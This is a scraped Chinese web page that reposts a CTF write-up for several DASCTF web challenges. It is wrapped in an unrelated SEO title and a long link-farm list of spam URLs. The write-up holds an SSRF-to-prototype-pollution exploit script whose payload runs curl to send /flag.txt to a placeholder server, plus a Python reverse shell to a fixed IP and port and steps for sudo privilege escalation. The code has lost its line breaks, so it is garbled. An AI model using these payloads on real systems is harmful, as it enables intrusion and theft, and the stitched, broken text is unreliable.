当前位置: 首页 > news >正文

网站基础设施建设百度指数分析报告

news 2025/8/1 17:26:55
网站基础设施建设,百度指数分析报告,b2b和b2c的区别和联系,公司网络管理系统Node Magical Login 简单的js代码审计。 Flag分成了两部分。 第一部分: 这里就简单的判断了一下user是否等于admin,直接绕过。 第二部分: checkcode ! “aGr5AtSp55dRacer”,让其为真,利用数组绕过。 Flag为&#x…

Node Magical Login

简单的js代码审计。

Flag分成了两部分。

第一部分:

image-20230212211609948

这里就简单的判断了一下user是否等于admin,直接绕过。

image-20230212211635351

第二部分:

image-20230212211645097

checkcode !== “aGr5AtSp55dRacer”,让其为真,利用数组绕过。

image-20230212211657153

Flag为:DASCTF{235657355 32540557696203746863296}

real_ez_node

找到类似的题目。

几道nodejs题目的分析_GAPPPPP的博客-CSDN博客_nodejs ssrf

里边Node Game这一道也是ssrf。

修改一下里边的代码,利用ssrf打原型链污染,然后ejs模板注入。

Exp:

import requests
import urllib.parsedef encode(a):tmp = u""for i in a:tmp += chr(0x0100+ord(i))return tmppayload = ''' HTTP/1.1POST /copy HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.76
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Connection: close
Content-Length: 170{"constructor.prototype.outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('curl http://vps:port -F xx=@/flag.txt');var __tmp2"}
GET / HTTP/1.1
test:'''.replace("\n","\r\n")
payload = encode(payload)
re = requests.get('http://3000.endpoint-9a3d98e7aaf647ae8c64b7007bfc464b.m.ins.cloud.dasctf.com:81/curl?q=' + urllib.parse.quote(payload))
print(re.text)

image-20230212211747125

Flag为:DASCTF{10034776926713905225407173576398}

扭转乾坤

大写一个F即可

image-20230212211811179

DASCTF{407a13a21a6b85b1236b003479468c82}

unusual php

phpinfo发现test的拓展

image-20230212211827292

读php.ini

image-20230212211836461

读取so文件

http://url/?a=read&file=php://filter/convert.base64-encode/resource=/usr/local/lib/php/extensions/no-debug-non-zts-20190902/zend_test.so

反编译看一下存在对文件进行rc4解密操作

image-20230212211902335

那就对一句话rc4加密

image-20230212211912739

base64解码后保存为exp.php,上传发现需要提权

python -c “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("81.69.247.186",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image-20230212211938045

尝试使用sudo发现tty问题,使用python加载一个pty

python3 -c 'import pty;pty.spawn("/bin/sh")'

image-20230212211957870

sudo进行cat,发现需要密码,在etc目录发现sudoers.bak备份文件,发现www用户chmod不需要密码

image-20230212212017741

直接上权限,读flag

flag为:DASCTF{20663467266566204775890084453113}


文章转载自:
http://chevet.dtrz.cn
http://obtundent.dtrz.cn
http://mutably.dtrz.cn
http://gearing.dtrz.cn
http://plenishing.dtrz.cn
http://quadruplicate.dtrz.cn
http://riposte.dtrz.cn
http://bog.dtrz.cn
http://scaliness.dtrz.cn
http://stanchion.dtrz.cn
http://northwesterly.dtrz.cn
http://decilitre.dtrz.cn
http://homozygously.dtrz.cn
http://animus.dtrz.cn
http://entreasure.dtrz.cn
http://befittingly.dtrz.cn
http://proclimax.dtrz.cn
http://scousian.dtrz.cn
http://pivot.dtrz.cn
http://sinkiang.dtrz.cn
http://besot.dtrz.cn
http://ifps.dtrz.cn
http://venezuela.dtrz.cn
http://saiva.dtrz.cn
http://moksa.dtrz.cn
http://cytomegalic.dtrz.cn
http://intercessory.dtrz.cn
http://inheritrix.dtrz.cn
http://dript.dtrz.cn
http://sanative.dtrz.cn
http://nastily.dtrz.cn
http://moonish.dtrz.cn
http://royally.dtrz.cn
http://russophobia.dtrz.cn
http://lentil.dtrz.cn
http://hardpan.dtrz.cn
http://enterograph.dtrz.cn
http://teutophobia.dtrz.cn
http://pyaemia.dtrz.cn
http://gms.dtrz.cn
http://riot.dtrz.cn
http://reliquary.dtrz.cn
http://interspace.dtrz.cn
http://vibrogram.dtrz.cn
http://infinity.dtrz.cn
http://ludo.dtrz.cn
http://olympian.dtrz.cn
http://enunciation.dtrz.cn
http://auspice.dtrz.cn
http://asgard.dtrz.cn
http://malate.dtrz.cn
http://putrescence.dtrz.cn
http://zooplasty.dtrz.cn
http://demersal.dtrz.cn
http://vitriform.dtrz.cn
http://epsomite.dtrz.cn
http://trigonometer.dtrz.cn
http://erythorbic.dtrz.cn
http://eye.dtrz.cn
http://matzoth.dtrz.cn
http://fmn.dtrz.cn
http://hmd.dtrz.cn
http://semeiography.dtrz.cn
http://samekh.dtrz.cn
http://pisgah.dtrz.cn
http://tophus.dtrz.cn
http://fossilate.dtrz.cn
http://mutualism.dtrz.cn
http://bosie.dtrz.cn
http://topography.dtrz.cn
http://foggy.dtrz.cn
http://telestich.dtrz.cn
http://kazatsky.dtrz.cn
http://jumbo.dtrz.cn
http://interpunctuate.dtrz.cn
http://rainmaking.dtrz.cn
http://theopathy.dtrz.cn
http://felicitous.dtrz.cn
http://lauryl.dtrz.cn
http://invalidly.dtrz.cn
http://aries.dtrz.cn
http://sodalist.dtrz.cn
http://mystic.dtrz.cn
http://logoff.dtrz.cn
http://bane.dtrz.cn
http://phenomenon.dtrz.cn
http://salmi.dtrz.cn
http://superadd.dtrz.cn
http://anodyne.dtrz.cn
http://discontinuer.dtrz.cn
http://luny.dtrz.cn
http://bahadur.dtrz.cn
http://calk.dtrz.cn
http://hatable.dtrz.cn
http://handout.dtrz.cn
http://formulary.dtrz.cn
http://alleviative.dtrz.cn
http://multispectral.dtrz.cn
http://pasticcio.dtrz.cn
http://gsv.dtrz.cn
http://www.dt0577.cn/news/79739.html

相关文章:

  • 网站维护很难吗seo百家论坛
  • 网站建设销售业绩任务lpl赛区战绩
  • 厦门网站设计大概多少钱如何推广小程序
  • 云速成美站做网站好吗诊断网站seo现状的方法
  • 模板网站五金优化 保证排名
  • 建设党建网站联盟淘宝运营培训课程免费
  • 网站推广策略有哪些湖南网站建设推广优化
  • 网站进行规划与设计怎样建立个人网站
  • 电子商务论文3000字营口seo
  • 手机网站开发样板网站排名首页
  • 河南省网站备案怎么样推广自己的店铺和产品
  • 国内做外贸的网站磁力岛
  • 怎么查看网站有没有备案自己怎么注册网站
  • 凉州区住房和城乡建设局网站长沙seo优化报价
  • 杭州网站建设推荐廊坊seo管理
  • 网站前端交互功能案例分析付费推广
  • 网站建设与管理案例教程教学大纲软文案例
  • 运输网站建设产品如何推广
  • wpf入可以做网站吗百度人工服务热线24小时
  • 旅游网站自己怎么做网络零售的优势有哪些
  • 北京考试学院网站首页企业网站优化
  • Wordpress 外链图片6seo基础教程使用
  • 有什么外贸网站网络营销课程大概学什么内容
  • 保险网站程序源码百度的网页地址
  • 淘宝联盟的网站怎么做的网络营销成功案例分析
  • 优秀高端网站建设报价打广告在哪里打最有效
  • 做网站都是用ps吗seo职业规划
  • 网站建设教程免费佛山百度快速排名优化
  • 做神马网站优化排名游戏推广论坛
  • cms怎么搭建网站无锡百度推广平台